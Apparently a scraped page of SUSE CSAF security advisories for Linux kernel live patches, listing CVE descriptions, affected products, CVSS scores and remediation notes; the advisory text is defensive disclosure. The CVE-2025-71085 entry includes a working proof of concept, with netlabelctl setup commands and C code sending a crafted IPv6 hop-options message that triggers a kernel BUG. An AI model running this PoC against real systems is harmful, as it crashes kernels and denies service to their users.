"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nata: libata-sff: Ensure that we cannot write outside the allocated buffer\n\nreveliofuzzing reported that a SCSI_IOCTL_SEND_COMMAND ioctl with out_len\nset to 0xd42, SCSI command set to ATA_16 PASS-THROUGH, ATA command set to\nATA_NOP, and protocol set to ATA_PROT_PIO, can cause ata_pio_sector() to\nwrite outside the allocated buffer, overwriting random memory.\n\nWhile a ATA device is supposed to abort a ATA_NOP command, there does seem\nto be a bug either in libata-sff or QEMU, where either this status is not\nset, or the status is cleared before read by ata_sff_hsm_move().\nAnyway, that is most likely a separate bug.\n\nLooking at __atapi_pio_bytes(), it already has a safety check to ensure\nthat __atapi_pio_bytes() cannot write outside the allocated buffer.\n\nAdd a similar check to ata_pio_sector(), such that also ata_pio_sector()\ncannot write outside the allocated buffer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-21738",
"url": "https://www.suse.com/security/cve/CVE-2025-21738"
},
{
"category": "external",
"summary": "SUSE Bug 1238917 for CVE-2025-21738",
"url": "https://bugzilla.suse.com/1238917"
},
{
"category": "external",
"summary": "SUSE Bug 1257118 for CVE-2025-21738",
"url": "https://bugzilla.suse.com/1257118"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T17:54:43Z",
"details": "important"
}
],
"title": "CVE-2025-21738"
},
{
"cve": "CVE-2025-38488",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38488"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix use-after-free in crypt_message when using async crypto\n\nThe CVE-2024-50047 fix removed asynchronous crypto handling from\ncrypt_message(), assuming all crypto operations are synchronous.\nHowever, when hardware crypto accelerators are used, this can cause\nuse-after-free crashes:\n\n crypt_message()\n // Allocate the creq buffer containing the req\n creq = smb2_get_aead_req(..., \u0026req);\n\n // Async encryption returns -EINPROGRESS immediately\n rc = enc ? crypto_aead_encrypt(req) : crypto_aead_decrypt(req);\n\n // Free creq while async operation is still in progress\n kvfree_sensitive(creq, ...);\n\nHardware crypto modules often implement async AEAD operations for\nperformance. When crypto_aead_encrypt/decrypt() returns -EINPROGRESS,\nthe operation completes asynchronously. Without crypto_wait_req(),\nthe function immediately frees the request buffer, leading to crashes\nwhen the driver later accesses the freed memory.\n\nThis results in a use-after-free condition when the hardware crypto\ndriver later accesses the freed request structure, leading to kernel\ncrashes with NULL pointer dereferences.\n\nThe issue occurs because crypto_alloc_aead() with mask=0 doesn\u0027t\nguarantee synchronous operation. Even without CRYPTO_ALG_ASYNC in\nthe mask, async implementations can be selected.\n\nFix by restoring the async crypto handling:\n- DECLARE_CRYPTO_WAIT(wait) for completion tracking\n- aead_request_set_callback() for async completion notification\n- crypto_wait_req() to wait for operation completion\n\nThis ensures the request buffer isn\u0027t freed until the crypto operation\ncompletes, whether synchronous or asynchronous, while preserving the\nCVE-2024-50047 fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38488",
"url": "https://www.suse.com/security/cve/CVE-2025-38488"
},
{
"category": "external",
"summary": "SUSE Bug 1247239 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247239"
},
{
"category": "external",
"summary": "SUSE Bug 1247240 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247240"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T17:54:43Z",
"details": "important"
}
],
"title": "CVE-2025-38488"
},
{
"cve": "CVE-2025-68285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix potential use-after-free in have_mon_and_osd_map()\n\nThe wait loop in __ceph_open_session() can race with the client\nreceiving a new monmap or osdmap shortly after the initial map is\nreceived. Both ceph_monc_handle_map() and handle_one_map() install\na new map immediately after freeing the old one\n\n kfree(monc-\u003emonmap);\n monc-\u003emonmap = monmap;\n\n ceph_osdmap_destroy(osdc-\u003eosdmap);\n osdc-\u003eosdmap = newmap;\n\nunder client-\u003emonc.mutex and client-\u003eosdc.lock respectively, but\nbecause neither is taken in have_mon_and_osd_map() it\u0027s possible for\nclient-\u003emonc.monmap-\u003eepoch and client-\u003eosdc.osdmap-\u003eepoch arms in\n\n client-\u003emonc.monmap \u0026\u0026 client-\u003emonc.monmap-\u003eepoch \u0026\u0026\n client-\u003eosdc.osdmap \u0026\u0026 client-\u003eosdc.osdmap-\u003eepoch;\n\ncondition to dereference an already freed map. This happens to be\nreproducible with generic/395 and generic/397 with KASAN enabled:\n\n BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70\n Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305\n CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266\n ...\n Call Trace:\n \u003cTASK\u003e\n have_mon_and_osd_map+0x56/0x70\n ceph_open_session+0x182/0x290\n ceph_get_tree+0x333/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n Allocated by task 13305:\n ceph_osdmap_alloc+0x16/0x130\n ceph_osdc_init+0x27a/0x4c0\n ceph_create_client+0x153/0x190\n create_fs_client+0x50/0x2a0\n ceph_get_tree+0xff/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n Freed by task 9475:\n kfree+0x212/0x290\n handle_one_map+0x23c/0x3b0\n ceph_osdc_handle_map+0x3c9/0x590\n mon_dispatch+0x655/0x6f0\n ceph_con_process_message+0xc3/0xe0\n ceph_con_v1_try_read+0x614/0x760\n ceph_con_workfn+0x2de/0x650\n process_one_work+0x486/0x7c0\n process_scheduled_works+0x73/0x90\n worker_thread+0x1c8/0x2a0\n kthread+0x2ec/0x300\n ret_from_fork+0x24/0x40\n ret_from_fork_asm+0x1a/0x30\n\nRewrite the wait loop to check the above condition directly with\nclient-\u003emonc.mutex and client-\u003eosdc.lock taken as appropriate. While\nat it, improve the timeout handling (previously mount_timeout could be\nexceeded in case wait_event_interruptible_timeout() slept more than\nonce) and access client-\u003eauth_err under client-\u003emonc.mutex to match\nhow it\u0027s set in finish_auth().\n\nmonmap_show() and osdmap_show() now take the respective lock before\naccessing the map as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68285",
"url": "https://www.suse.com/security/cve/CVE-2025-68285"
},
{
"category": "external",
"summary": "SUSE Bug 1255401 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "external",
"summary": "SUSE Bug 1255402 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T17:54:43Z",
"details": "important"
}
],
"title": "CVE-2025-68285"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T17:54:43Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T17:54:43Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
}
]
}
SUSE-SU-2026:1046-1
Vulnerability from csaf_suse - Published: 2026-03-25 19:34 - Updated: 2026-03-25 19:34Summary
Security update for the Linux Kernel (Live Patch 36 for SUSE Linux Enterprise 15 SP4)
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel (Live Patch 36 for SUSE Linux Enterprise 15 SP4)
Description of the patch:
This update for the SUSE Linux Enterprise Kernel 5.14.21-150400.24.150 fixes various security issues
The following security issues were fixed:
- CVE-2022-50697: mrp: introduce active flags to prevent UAF when applicant uninit (bsc#1255595).
- CVE-2023-53781: smc: Fix use-after-free in tcp_write_timer_handler() (bsc#1254755).
- CVE-2025-21738: ata: libata-sff: ensure that we cannot write outside the allocated buffer (bsc#1257118).
- CVE-2025-38159: wifi: rtw88: fix the 'para' buffer size to avoid reading out of bounds (bsc#1257629).
- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).
- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).
- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).
- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).
Patchnames: SUSE-2026-1046,SUSE-SLE-Module-Live-Patching-15-SP4-2026-1046
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.8 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.8 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.3 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP4:kernel-livepatch-5_14_21-150400_24_150-default-16-150400.2.2.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
References
54 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel (Live Patch 36 for SUSE Linux Enterprise 15 SP4)",
"title": "Title of the patch"
},
{
"category": "description",
